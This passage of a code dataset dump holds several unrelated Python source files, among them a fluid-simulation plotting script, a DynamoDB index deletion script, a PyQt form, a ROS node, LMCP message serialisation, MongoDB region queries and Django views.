contour\nux_ref = numpy.zeros([len(x),len(y),len(z)])\nuy_ref = numpy.transpose(numpy.broadcast_to(-0.5*x,(len(x),len(y),len(z))))\n#uy_ref = numpy.zeros([len(x),len(y),len(z)])\n#ux_shear_profile = -0.5*x\n#for i in range(len(y)):\n# for j in range(len(z)):\n# uy[:,i,j] = ux_shear_profile\nuz_ref = numpy.zeros([len(x),len(y),len(z)])\nsumthin = ((ux - ux_ref)**2 + (uy - uy_ref)**2 + (uz - uz_ref)**2)**(0.5)\nax1.pcolormesh(x,z,sumthin[:,iyslice,:])\nax1.set_title(\"gas velocity residuals at y=0\")\nax1.set_xlabel(\"x\")\nax1.set_ylabel(\"z\")\n\n# vorticity contour\n#velocity_array = numpy.array([ux,uy,uz])\n#vorticity_raw = pencil.curl(velocity_array,data.dx,data.dy,data.dz)\n#vorticity_x = vorticity_raw[0][3:-3,3:-3,3:-3]\n#vorticity_y = vorticity_raw[1][3:-3,3:-3,3:-3]\n#vorticity_z = vorticity_raw[2][3:-3,3:-3,3:-3]\nvorticity = data.vort[:,3:-3,3:-3,3:-3]\nvorticity_mag = (vorticity[0]**2 + vorticity[1]**2 + vorticity[2]**2)**(0.5)\nax2.pcolormesh(x,z,vorticity_mag[:,iyslice,:])\nax2.set_title(\"magnitude of vorticity at y=0\")\nax2.set_xlabel(\"x\")\nax2.set_ylabel(\"z\")\n\n# dust to gas ratio contour\nfilename = \"rhop_orbit-\" + str(snap) + \".pickle\"\ntry:\n rhop_file = open(filename,\"r\")\n rhop = pickle.load(rhop_file)\nexcept IOError:\n rhop_file = open(filename,\"w\")\n rhop = pencil.particles_to_density(xp,yp,zp,data.x,data.y,data.z)[3:-3,3:-3,3:-3]\n pickle.dump(rhop,rhop_file)\n rhop_file.close()\nepsilon_d = parameters.eps_dtog*rhop/rho\nax3.pcolormesh(x,z,epsilon_d[:,iyslice,:])\nax3.set_title(\"dust to gas ratio at y=0\")\nax3.set_xlabel(\"x\")\nax3.set_ylabel(\"z\")\n\n# typical particle velocity vs epsilon for each grid cell\nfilename = \"vp_rms_orbit-\" + str(snap) + \".pickle\"\ntry:\n vp_rms_file = open(filename,\"r\")\n vp_rms = pickle.load(vp_rms_file)\n where_particles = numpy.where(vp_rms != 0.0)\nexcept IOError:\n vp_rms_file = open(filename,\"w\")\n npar = numpy.zeros([len(x),len(y),len(z)])\n vp_rms = numpy.zeros([len(x),len(y),len(z)])\n for ip in range(len(pdata.ipars)):\n xpar = xp[ip]\n ypar = yp[ip]\n zpar = zp[ip]\n ix = numpy.where(numpy.abs(xpar - x) == numpy.abs(xpar - x).min())[0][0]\n iy = numpy.where(numpy.abs(ypar - y) == numpy.abs(ypar - y).min())[0][0]\n iz = numpy.where(numpy.abs(zpar - z) == numpy.abs(zpar - z).min())[0][0]\n vp_rms[ix,iy,iz] += (vpx[ip]**2 + vpy[ip]**2 + vpz[ip]**2)**(0.5)\n npar[ix,iy,iz] += 1\n prog = float(ip)/float(len(pdata.ipars))\n sys.stdout.write(\"\\r\" + str(prog))\n sys.stdout.flush()\n where_particles = numpy.where(npar != 0)\n vp_rms[where_particles] = vp_rms[where_particles]/npar[where_particles]\n pickle.dump(vp_rms,vp_rms_file)\n vp_rms_file.close()\nvp_rms_pars = vp_rms[where_particles]\nepsilon_d_pars = epsilon_d[where_particles]\norder = numpy.unravel_index(numpy.argsort(epsilon_d_pars),epsilon_d_pars.shape)\nax4.scatter(epsilon_d_pars[order],vp_rms_pars[order]**2,s=markersize,color=\"black\")\nax4.set_title(\"rms particle velocity vs dust to gas ratio\")\nax4.set_xlabel(r\"$\\epsilon_{d}$\")\nax4.set_ylabel(r\"$v_{p,rms}$\")\n\n# voticity vs epsilon for each grid cell\n\nvorticity_mag_pars = vorticity_mag[where_particles]\nax5.scatter(epsilon_d_pars[order],vorticity_mag_pars[order],s=markersize,color=\"black\")\nax5.set_title(\"magnitude of vorticity vs dust to gas ratio\")\nax5.set_xlabel(r\"$\\epsilon_{d}$\")\nax5.set_ylabel(r\"|$\\omega$|\")\n\n# ratio of typical velocites for particles and gas in each grid cell\n\numag = (data.ux[3:-3,3:-3,3:-3]**2 + data.uy[3:-3,3:-3,3:-3]**2 + 
data.uz[3:-3,3:-3,3:-3]**2)**(0.5)\nvelocity_ratio = vp_rms_pars/umag[where_particles]\nax6.scatter(epsilon_d_pars[order],velocity_ratio[order],s=markersize,color=\"black\")\nax6.axhline(1.0)\nax6.set_title(\"(rms particle velocity)/(magnitude of gas velocity) vs dust to gas ratio\")\nax6.set_xlabel(r\"$\\epsilon_{d}$\")\nax6.set_ylabel(r\"|$\\omega$|\")\n\npyplot.show()\n","sub_path":"pencil-runs/python_scripts/old_turbophoresis-plots.py","file_name":"old_turbophoresis-plots.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129458483","text":"from pprint import pprint\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nimport argparse\r\nimport time\r\nfrom decimal import *\r\n\r\ndef RemoveGSI(attributename):\r\n region=boto3.session.Session().region_name\r\n dynamodb = boto3.resource('dynamodb', region_name=region) #low-level Client\r\n table = dynamodb.Table('movies') #define which dynamodb table to access\r\n oldindexname = attributename + \"-globo-index\"\r\n\r\n response = table.update(\r\n GlobalSecondaryIndexUpdates=[\r\n {\r\n 'Delete': {\r\n 'IndexName': oldindexname\r\n }\r\n }\r\n ],\r\n )\r\n return response\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"indexattribute\", help=\"Delete GSI based on attribute entered here\")\r\n args = parser.parse_args()\r\n oldGSIkey = (args.indexattribute) #section to collect argument from command line\r\n\r\n result = RemoveGSI(oldGSIkey)\r\n","sub_path":"lab_reference_scripts/DeleteGSI.py","file_name":"DeleteGSI.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540188511","text":"import yaml\nfrom dotmap import DotMap\nimport operator\nimport os\n\n\nclass MyDotMap(DotMap):\n\n def __init__(self, *args, **kwargs):\n DotMap.__init__(self, *args, **kwargs)\n\n def set(self, key, value):\n keys = key.split('.')\n reduce(operator.getitem, keys[:-1], self)[keys[-1]] = value\n\n def to_dict(self):\n return self.toDict()\n\n\ndef get_dict(path, yaml_file):\n return MyDotMap(get_yaml(path, yaml_file))\n\n\ndef get_yaml(path, yaml_file):\n with open(os.path.join(path, yaml_file), 'r') as yaml_data:\n return yaml.safe_load(yaml_data)\n\n\ndef is_equal(object_a, object_b):\n if isinstance(object_a, list):\n if len(object_a) == len(object_b):\n for item_a in object_a:\n if isinstance(item_a, str) or isinstance(item_a, float)\\\n or isinstance(item_a, int) or isinstance(item_a, unicode):\n if item_a not in object_b:\n return False\n elif isinstance(item_a, dict):\n _is_in = False\n for item_b in object_b:\n if cmp(item_a, item_b) == 0:\n _is_in = True\n break\n if not _is_in:\n return False\n\n else:\n if not item_a.is_in(object_b):\n return False\n return True\n else:\n return False\n elif isinstance(object_a, dict):\n return cmp(object_a, object_b) == 0\n","sub_path":"kiali_qe/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22794511","text":"from os.path import splitext, basename\nfrom glob import glob\nimport torch\nimport sys\nimport re\n\n\nclass Embeder():\n \n def __init__(self, embedings_file):\n self.embedings = self.load_embedings(embedings_file)\n\n def load_embedings(self, filename):\n embed = {}\n with open(filename, 'r') as f:\n for 
line in f.readlines():\n                l = line.strip().split()\n                char = l[0]\n                vec = list(map(float, l[1:]))  # materialized so FloatTensor always receives a sequence\n                embed[char] = torch.FloatTensor(vec)\n        return embed\n\n    def get_embeding(self, text):\n        embed = torch.stack([self.embedings[c] for c in text])\n        return embed.mean(0)\n    \ndef load_url_embedings(directory, embeding_file='../embedings.txt', stop=None):\n    embedings = []\n    e = Embeder(embeding_file)\n    for i, f in enumerate(glob('{}/*.jpg'.format(directory))):\n        if stop is not None and i >= stop:\n            break\n        url = splitext(basename(f))[0]\n        url = re.sub(r'', '.', url)\n        embed = e.get_embeding(url)\n        embedings.append(embed)\n    return torch.stack(embedings)\n\n\n","sub_path":"gan/embedings.py","file_name":"embedings.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171802580","text":"from typing import Optional\n\nfrom gfw_pixetl import get_module_logger\n\nlogger = get_module_logger(__name__)\n\n\nclass DataType(object):\n    def __init__(\n        self,\n        data_type: str,\n        no_data: Optional[int],\n        nbits: Optional[int],\n        compression: str,\n    ) -> None:\n        self.data_type: str = data_type\n        self.no_data: Optional[int] = no_data\n        self.nbits: Optional[int] = nbits\n        self.compression: str = compression\n\n\ndef data_type_factory(\n    data_type: str, nbits: Optional[int] = None, no_data: Optional[int] = None, **kwargs\n) -> DataType:\n    # nbits is kept only when it falls inside the valid range for the type, otherwise it is dropped\n    if data_type.lower() == \"boolean\":\n        return DataType(data_type=\"Byte\", no_data=0, nbits=1, compression=\"CCITTFAX4\")\n\n    elif data_type.lower() == \"uint\":\n        return DataType(\n            data_type=\"Byte\",\n            no_data=0 if not no_data else no_data,\n            nbits=nbits if nbits in range(1, 8) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"int\":\n        return DataType(\n            data_type=\"Byte\",\n            no_data=None if not no_data else no_data,\n            nbits=nbits if nbits in range(1, 8) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"uint16\":\n        return DataType(\n            data_type=\"UInt16\",\n            no_data=0 if not no_data else no_data,\n            nbits=nbits if nbits in range(9, 16) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"int16\":\n        return DataType(\n            data_type=\"Int16\",\n            no_data=None if not no_data else no_data,\n            nbits=nbits if nbits in range(9, 16) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"uint32\":\n        return DataType(\n            data_type=\"UInt32\",\n            no_data=0 if not no_data else no_data,\n            nbits=nbits if nbits in range(17, 32) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"int32\":\n        return DataType(\n            data_type=\"Int32\",\n            no_data=None if not no_data else no_data,\n            nbits=nbits if nbits in range(17, 32) else None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"float16\" or data_type.lower() == \"half\":\n        return DataType(\n            data_type=\"Float32\",\n            no_data=None if not no_data else no_data,\n            nbits=16,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"float32\" or data_type.lower() == \"single\":\n        return DataType(\n            data_type=\"Float32\",\n            no_data=None if not no_data else no_data,\n            nbits=None,\n            compression=\"DEFLATE\",\n        )\n\n    elif data_type.lower() == \"float64\" or data_type.lower() == \"double\":\n        return DataType(\n            data_type=\"Float64\",\n            no_data=None if not no_data else no_data,\n            nbits=None,\n            compression=\"DEFLATE\",\n        )\n\n    else:\n        message = \"Unknown data 
type {}\".format(data_type)\n logger.exception(message)\n raise ValueError(message)\n","sub_path":"gfw_pixetl/data_type.py","file_name":"data_type.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313833096","text":"import logging\n\nfrom PyQt5.QtWidgets import (\n QMainWindow,\n QLineEdit,\n QRadioButton,\n QPushButton,\n QLabel,\n QGridLayout,\n QWidget,\n QMessageBox,\n)\nfrom PyQt5.QtCore import QSize\n\nlogger = logging.getLogger(\"project-logger\")\n\nclass Form(QWidget):\n\n def __init__(self):\n super(Form, self).__init__()\n\n # GUI components\n self.input_txt = QLineEdit(self)\n self.radio_one = QRadioButton(self)\n self.radio_two = QRadioButton(self)\n self.label = QLabel(self)\n self.button = QPushButton(self)\n\n self.grid = QGridLayout(self)\n\n self.ui()\n self.properties()\n self.events()\n\n def button_clicked(self):\n logger.debug(\"button_clicked\")\n \n msg = QMessageBox(self)\n msg.setText(\"Hi!\")\n msg.setInformativeText(\"Sample Message box with some buttons\")\n msg.setStandardButtons(QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n msg.setDefaultButton(QMessageBox.Save)\n\n ret = msg.exec_()\n \n tmp_dict = {\n QMessageBox.Save: \"Save\",\n QMessageBox.Discard: \"Discard\",\n QMessageBox.Cancel: \"Cancel\",\n }\n\n logger.debug(\"user has clicked on: {}\".format(tmp_dict.get(ret)))\n \n def properties(self):\n self.button.setText(\"Click\")\n self.radio_one.setText(\"Radio One\")\n self.radio_two.setText(\"Radio Two\")\n self.label.setText(\"Label: \")\n\n def events(self):\n self.button.clicked.connect(self.button_clicked)\n \n def ui(self):\n\n self.grid.addWidget(self.label, 0, 0, 1, 1)\n self.grid.addWidget(self.input_txt, 0, 1, 1, 1)\n self.grid.addWidget(self.radio_one, 1, 0, 1, 1)\n self.grid.addWidget(self.radio_two, 2, 0, 1, 1)\n self.grid.addWidget(self.button, 3, 0, 1, 1)\n\n self.setLayout(self.grid)\n \n \n\n \nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n\n self.central_widget = Form()\n self.setCentralWidget(self.central_widget)\n \n self.setMinimumSize(QSize(1000, 500))\n","sub_path":"gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180880392","text":"#!/usr/bin/env python\n# This file is part of test_demo launch file in ishan_ros.\n\nimport rospy\nfrom std_msgs.msg import String\n\nclass PlatformControllers():\n def __init__(self):\n \n rospy.init_node('ish_platf_controllers', anonymous=False)\n \n rospy.loginfo(\"Platform Controllers Node Started\")\n \n self.platfExecutorsTopic = rospy.get_param(\"~platformexecutorsdata\", '/fmCommands/plaExeDat')\n self.platfControllersTopic = rospy.get_param(\"~platformcontrollersdata\", '/fmSignals/plaConDat')\n self.incidentHandlerTopic = rospy.get_param(\"~incidenthandlerdata\", '/fmSafety/incHanDat')\n \n self.pub = rospy.Publisher(self.platfControllersTopic,String)\n r = rospy.Rate(1)\n r.sleep()\n \n rospy.Subscriber(self.platfExecutorsTopic,String,self.on_platfExecutorsTopic)\n rospy.Subscriber(self.incidentHandlerTopic,String, self.on_incidentHandlerTopic)\n \n while not rospy.is_shutdown():\n str = \"PlatformControllersData\"\n self.pub.publish(str)\n r.sleep()\n \n def on_platfExecutorsTopic(self,msg):\n rospy.sleep(20)\n \n def on_incidentHandlerTopic(self,msg):\n rospy.sleep(20) \n\nif __name__ == 
'__main__':\n try:\n PlatformControllers()\n except:\n rospy.loginfo(\"Platform Controllers Node Terminated\")","sub_path":"fmControllers/platform/ishan/ish_platfControllers/src/ish_platf_controllers.py","file_name":"ish_platf_controllers.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450310791","text":"from collections import deque\n\n\nclass Node:\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self, representation):\n '''\n representation: list of values representing a binary tree. The left and right\n children of the ith element are 2i+1 and 2i+2, respectively.\n '''\n if not representation:\n return None\n nodes = []\n for i, value in enumerate(representation):\n node = None\n if value is not None:\n node = Node(value)\n if i > 0:\n if i % 2 == 1:\n parent = nodes[(i - 1) // 2]\n parent.left = node\n else:\n parent = nodes[(i - 2) // 2]\n parent.right = node\n nodes.append(node)\n self.root = nodes[0]\n\n @property\n def height(self):\n return self._get_height(self.root)\n\n def _get_height(self, node):\n if node is None:\n return -1\n left_height = self._get_height(node.left)\n right_height = self._get_height(node.right)\n return max(left_height, right_height) + 1\n\n def to_representation(self):\n total_full = 2**(self.height+1)-1 # Number of nodes in the full tree\n representation = []\n q = deque([self.root])\n i = 0\n last_node = -1\n while q and i < total_full:\n node = q.popleft()\n value = None\n left, right = None, None\n if node:\n left = node.left\n right = node.right\n value = node.value\n last_node = i\n q.append(left)\n q.append(right)\n representation.append(value)\n\n i += 1\n return representation[:last_node+1]\n\n def __str__(self):\n VALUE_SIZE = 3\n VALUE_FORMAT = '{:^' + str(VALUE_SIZE) + 'd}'\n LEFT_ARROW = ' /'\n RIGHT_ARROW = '\\\\ '\n representation = self.to_representation()\n height = self.height\n lines = []\n outer = 0\n inner = 1\n prev_h_line = (2**(height+1)-1)*VALUE_SIZE*' '\n for level in range(height, -1, -1):\n first = True\n outer_spaces = VALUE_SIZE * outer * ' '\n inner_spaces = VALUE_SIZE * inner * ' '\n line = outer_spaces\n arrows_line = outer_spaces\n h_line = (2**(height+1)-1)*VALUE_SIZE*' '\n for i in range(2**level-1, 2**(level+1)-1):\n value_str = VALUE_SIZE * ' '\n arrows_str = value_str\n h_start_add = None\n h_end_add = None\n if i < len(representation) and representation[i] is not None:\n value_str = (VALUE_FORMAT).format(representation[i])\n if i % 2 == 1:\n arrows_str = LEFT_ARROW\n h_start_add = VALUE_SIZE\n h_end_add = h_start_add+outer*VALUE_SIZE+VALUE_SIZE//2\n else:\n arrows_str = RIGHT_ARROW\n h_start_add = -(outer+1)*VALUE_SIZE+VALUE_SIZE//2\n h_end_add = 0\n if first:\n first = False\n else:\n arrows_line += inner_spaces\n line += inner_spaces\n if h_start_add is not None and h_end_add is not None:\n h_start = len(arrows_line) + h_start_add\n h_end = len(arrows_line) + h_end_add\n h_line = _insert_str(h_line, '_', h_start, h_end)\n arrows_line += arrows_str\n line += value_str\n line += outer_spaces\n arrows_line += outer_spaces\n line = _merge_lines(line, prev_h_line)\n prev_h_line = h_line\n lines.append(line)\n if level > 0:\n lines.append(arrows_line)\n outer = inner\n inner = 2*inner+1\n remove_left = min([len(line)-len(line.lstrip()) for line in lines])\n remove_right = min([len(line)-len(line.rstrip()) for line in lines])\n lines = 
[line[remove_left:-remove_right] for line in lines]\n return '\\n'.join(reversed(lines))\n\n\ndef _insert_str(string, char, start_pos, end_pos):\n replacement = char * (end_pos - start_pos)\n return string[:start_pos] + replacement + string[end_pos:]\n\n\ndef _merge_lines(line, h_line):\n for i, (c_line, c_h_line) in enumerate(zip(line, h_line)):\n if len(c_line.strip()) == 0:\n line = line[:i] + c_h_line + line[i+1:]\n return line\n\n\nif __name__ == \"__main__\":\n print(Tree(list(range(12))))\n","sub_path":"recursion/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"58157357","text":"#! /usr/bin/python\n\nimport struct\nfrom lmcp import LMCPObject\n#import xml.dom.minidom\n\n#from lmcp import *\nfrom afrl.cmasi import SearchTask\nfrom afrl.cmasi import Location3D\nfrom afrl.cmasi import Wedge\n\n\nclass PointSearchTask(SearchTask.SearchTask):\n\n def __init__(self):\n SearchTask.SearchTask.__init__(self)\n self.LMCP_TYPE = 41\n self.SERIES_NAME = \"CMASI\"\n #Series Name turned into a long for quick comparisons.\n self.SERIES_NAME_ID = 4849604199710720000\n self.SERIES_VERSION = 3\n\n #Define message fields\n self.SearchLocation = Location3D.Location3D() #Location3D\n self.StandoffDistance = 0 #real32\n self.ViewAngleList = [] #Wedge\n\n\n def pack(self):\n \"\"\"\n Packs the object data and returns a string that contains all of the serialized\n members.\n \"\"\"\n buffer = []\n buffer.extend(SearchTask.SearchTask.pack(self))\n buffer.append(struct.pack(\"B\", self.SearchLocation != None ))\n if self.SearchLocation != None:\n buffer.append(struct.pack(\">q\", self.SearchLocation.SERIES_NAME_ID))\n buffer.append(struct.pack(\">I\", self.SearchLocation.LMCP_TYPE))\n buffer.append(struct.pack(\">H\", self.SearchLocation.SERIES_VERSION))\n buffer.append(self.SearchLocation.pack())\n buffer.append(struct.pack(\">f\", self.StandoffDistance))\n buffer.append(struct.pack(\">H\", len(self.ViewAngleList) ))\n for x in self.ViewAngleList:\n buffer.append(struct.pack(\"B\", x != None ))\n if x != None:\n buffer.append(struct.pack(\">q\", x.SERIES_NAME_ID))\n buffer.append(struct.pack(\">I\", x.LMCP_TYPE))\n buffer.append(struct.pack(\">H\", x.SERIES_VERSION))\n buffer.append(x.pack())\n\n return \"\".join(buffer)\n\n def unpack(self, buffer, _pos):\n \"\"\"\n Unpacks data from a string buffer and sets class members\n \"\"\"\n _pos = SearchTask.SearchTask.unpack(self, buffer, _pos)\n _valid = struct.unpack_from(\"B\", buffer, _pos )[0]\n _pos += 1\n if _valid:\n _series = struct.unpack_from(\">q\", buffer, _pos)[0]\n _pos += 8\n _type = struct.unpack_from(\">I\", buffer, _pos)[0]\n _pos += 4\n _version = struct.unpack_from(\">H\", buffer, _pos)[0]\n _pos += 2\n from lmcp import LMCPFactory\n self.SearchLocation = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )\n _pos = self.SearchLocation.unpack(buffer, _pos)\n else:\n self.SearchLocation = None\n self.StandoffDistance = struct.unpack_from(\">f\", buffer, _pos)[0]\n _pos += 4\n _arraylen = struct.unpack_from(\">H\", buffer, _pos )[0]\n _arraylen = struct.unpack_from(\">H\", buffer, _pos )[0]\n self.ViewAngleList = [None] * _arraylen\n _pos += 2\n for x in range(_arraylen):\n _valid = struct.unpack_from(\"B\", buffer, _pos )[0]\n _pos += 1\n if _valid:\n _series = struct.unpack_from(\">q\", buffer, _pos)[0]\n _pos += 8\n _type = struct.unpack_from(\">I\", buffer, _pos)[0]\n _pos += 4\n _version = 
struct.unpack_from(\">H\", buffer, _pos)[0]\n _pos += 2\n from lmcp import LMCPFactory\n self.ViewAngleList[x] = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )\n _pos = self.ViewAngleList[x].unpack(buffer, _pos)\n else:\n self.ViewAngleList[x] = None\n return _pos\n\n\n def get_SearchLocation(self):\n return self.SearchLocation\n\n def set_SearchLocation(self, value):\n self.SearchLocation = value \n\n def get_StandoffDistance(self):\n return self.StandoffDistance\n\n def set_StandoffDistance(self, value):\n self.StandoffDistance = float( value )\n\n def get_ViewAngleList(self):\n return self.ViewAngleList\n\n\n\n def toString(self):\n \"\"\"\n Returns a string representation of all variables\n \"\"\"\n buf = SearchTask.SearchTask.toString(self)\n buf += \"From PointSearchTask:\\n\"\n buf += \"SearchLocation = \" + str( self.SearchLocation ) + \"\\n\" \n buf += \"StandoffDistance = \" + str( self.StandoffDistance ) + \"\\n\" \n buf += \"ViewAngleList = \" + str( self.ViewAngleList ) + \"\\n\" \n\n return buf;\n\n def getLMCPType(self):\n return self.LMCP_TYPE\n\n def getSeriesName(self):\n return self.SERIES_NAME\n\n def getSeriesNameID(self):\n return self.SERIES_NAME_ID\n\n def getSeriesVersion(self):\n return self.SERIES_VERSION\n\n def toXMLStr(self, ws):\n str = ws + \"\\n\";\n #str +=SearchTask.SearchTask.toXMLMembersStr(self, ws + \" \")\n str += self.toXMLMembersStr(ws + \" \")\n str += ws + \"\\n\";\n return str\n\n def toXMLMembersStr(self, ws):\n buf = \"\"\n buf += SearchTask.SearchTask.toXMLMembersStr(self, ws)\n buf += ws + \"\\n\"\n if self.SearchLocation == None:\n buf += ws + \" \\n\"\n else:\n buf += ws + self.SearchLocation.toXMLStr(ws + \" \") \n buf += ws + \"\\n\"\n buf += ws + \"\" + str(self.StandoffDistance) + \"\\n\"\n buf += ws + \"\\n\"\n for x in self.ViewAngleList:\n if x == None:\n buf += ws + \" \\n\"\n else:\n buf += x.toXMLStr(ws + \" \") \n buf += ws + \"\\n\"\n\n return buf\n \n","sub_path":"concept/auto_generated/afrl/cmasi/PointSearchTask.py","file_name":"PointSearchTask.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260093678","text":"import json\nimport os\nimport urllib.request\n\nimport pymongo\nfrom shapely.geometry import asShape\n\nimport configure\n\nsettings = configure.settings\n\nroi_coll = pymongo.MongoClient()[settings[\"mongodb\"][\"dbname\"]][settings[\"mongodb\"][\"collname\"][\"rois\"]]\nrsis_coll = pymongo.MongoClient()[settings[\"mongodb\"][\"dbname\"]][settings[\"mongodb\"][\"collname\"][\"rsis\"]]\nlocaldir = settings[\"quickimage\"][\"localdir\"]\n\ndef get_wkt(name):\n return asShape(roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"]).wkt\n\n\ndef getall_wkt():\n return {roi[\"_id\"]: asShape(roi[\"geojson\"]).wkt for roi in roi_coll.find()}\n\n\ndef get_shape(name):\n return asShape(roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"])\n\n\ndef get(name):\n return roi_coll.find_one({\"_id\": name.lower()})[\"geojson\"]\n\n\ndef insert_from_jsonfile(jsonfile):\n with open(jsonfile, encoding=\"utf-8\") as f:\n geojson = json.load(f)\n roi_coll.insert_many(geojson[\"features\"])\n\ndef savequickimage2local(url, localpath, try_num=10):\n if try_num > 0:\n try:\n urllib.request.urlretrieve(url, localpath + \".temp\")\n os.rename(localpath + \".temp\", localpath)\n return localpath\n except Exception:\n return savequickimage2local(url, localpath, try_num - 1)\n else:\n return None\n\ndef 
get_rsis_by_roi(roi_name):\n querydoc = {\n \"overlay\": {\n \"$geoIntersects\": {\n \"$geometry\": roi_coll.find_one({\"properties.Name\": roi_name})[\"geometry\"]\n }}}\n return [rsi[\"_id\"] for rsi in rsis_coll.find(querydoc)]\n\n\ndef update_roi_quickimages():\n roi_names = [roi[\"properties\"][\"Name\"] for roi in roi_coll.find()]\n for roi_name in roi_names:\n querydoc = {\n \"overlay\": {\n \"$geoIntersects\": {\n \"$geometry\": roi_coll.find_one({\"properties.Name\": roi_name})[\"geometry\"]\n }},\n \"localquickimage\": {\"$exists\": False}\n }\n rsis = [rsi for rsi in rsis_coll.find(querydoc)]\n count = 0\n print(roi_name, \"start\")\n for rsi in rsis:\n quickimagename = rsi[\"_id\"] + \".jpg\"\n quickimagepath = os.path.join(localdir, quickimagename)\n if not os.path.exists(quickimagepath):\n savequickimage2local(rsi[\"quickimage\"], quickimagepath)\n rsis_coll.find_one_and_update({\"_id\": rsi[\"_id\"]}, {\"$set\": {\"localquickimage\": quickimagepath}})\n count += 1\n print(count, \"of\", len(rsis), \"done\")\n print(roi_name, \"all quickimage updated\")\n\n# def update_roi_localquickimages():\n# for rsi in rsis_coll.find():\n# quickimagename = rsi[\"_id\"] + \".jpg\"\n# quickimagepath = os.path.join(localdir, quickimagename)\n# if os.path.exists(quickimagepath):\n# rsis_coll.find_one_and_update({\"_id\": rsi[\"_id\"]}, {\n# \"$set\": {\"localquickimage\": quickimagepath}})\n# print(\"all localquickimage update\")\n\n\nif __name__ == '__main__':\n update_roi_quickimages()","sub_path":"roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107161233","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .models import *\nimport os\nimport app.tell\n\n# Create your views here.\n\ndef index(request):\n if os.listdir('static/media/'):\n for img in os.listdir('static/media/'):\n if os.path.isfile('static/media/'+img):\n os.remove('static/media/'+img)\n for img in os.listdir('static/media/img/'):\n os.remove('static/media/img/' + img)\n for img in os.listdir('static/media/star/'):\n os.remove('static/media/star/' + img)\n for img in os.listdir('static/media/animal/'):\n os.remove('static/media/animal/' + img)\n return render(request, 'index.html')\n\ndef story(request):\n s = Stories.objects.all()\n context = {'s': s}\n return render(request, 'story/story.html', context=context)\n\ndef talk(request):\n name = request.POST.get('s')\n try:\n app.tell.robot(name)\n return redirect('/smart/index/')\n except Exception:\n return redirect('/smart/index/')\n","sub_path":"smart/taletelling/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608873558","text":"import pandas as pd\n\npd.set_option('display.max_columns', 100)\npd.set_option('display.width', 1000)\n\necon_data = pd.read_csv('/Users/salma/Research/us-crime-analytics/data/econ_dec_90_15.csv')\n\n'''\n'ORI', 'AGENCY', 'CNTY' obtained from crime files since econ api data is merged right with crime data on state and\nplace fips to obtain these. 
So, under identity columns, only placename would have NaN values for the rows which don't\nhave economic data but had crime data\n'''\n\n#########\n# So we need to fill placename with any of the non missing place values in the group\necon_data['placename'] = econ_data.groupby('ORI')['placename'].apply(lambda x: x.ffill().bfill())\n\n#######\n# Now to fill all NaNs in numeric columns in a particular group with respective means\n\nnum_cols = ['pci_total_pop', 'pci_white', 'pci_black', 'emp_total_male', 'emp_total_female', 'emp_total',\n 'emp_total_male_white', 'emp_total_female_white', 'emp_total_male_black', 'emp_total_female_black',\n 'pci_hisp', 'emp_total_male_hisp', 'emp_total_female_hisp']\n\necon_data[[x for x in num_cols]] = econ_data.groupby('ORI', as_index=False)[num_cols]\\\n .transform(lambda x: x.fillna(x.mean()))\n\necon_data.to_csv('/Users/salma/Research/us-crime-analytics/data/econ_dec_90_15_missing_filled.csv', index=False)","sub_path":"utilities/economic_api_data_filler.py","file_name":"economic_api_data_filler.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480001371","text":"from django import forms\n\nfrom byro.common.models import Configuration\n\n\nclass InitialForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.required = True\n\n class Meta:\n model = Configuration\n fields = (\"name\", \"backoffice_mail\", \"mail_from\")\n\n\nclass ConfigurationForm(forms.ModelForm):\n class 